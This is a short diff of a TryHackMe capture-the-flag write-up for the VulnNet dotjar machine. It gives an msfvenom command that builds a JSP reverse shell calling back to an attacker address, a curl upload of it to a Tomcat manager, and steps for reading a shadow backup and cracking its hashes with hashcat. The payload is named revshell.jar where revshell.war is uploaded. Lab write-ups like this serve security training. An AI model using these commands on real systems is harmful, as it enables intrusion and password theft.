ChrisPritchard/ctf-writeups/tryhackme/vulnnetdotjar.md

 - First I created a jsp-based reverse shell with msfvenom: `msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.108.144 LPORT=4444 -f raw -o revshell.jar`
 - Then I uploaded this using curl: `curl -u <redacted> --upload-file revshell.war http://10.10.104.169:8080/manager/text/deploy?path=/revshell`
-- Finally, by starting a nc listener and navigating to `http://10.10.104.169:8080/revshell`

-This got me onto the machine as 'web'.
+- Finally, by starting a nc listener and navigating to `http://10.10.104.169:8080/revshell`, I got onto the machine as 'web'.

 From here it was somewhat easy.
 I ran linpeas, and found a backup file under backups I could read, `shadow-backup-alt.gz`.
 Unzipping this got me a copy of shadow with the hashes for `web` and the other user, `jdk-admin`.
 I put these through hashcat with rockyou and `-m 1800` and quickly got the jdk-admin password.
 In their home directory was the user flag.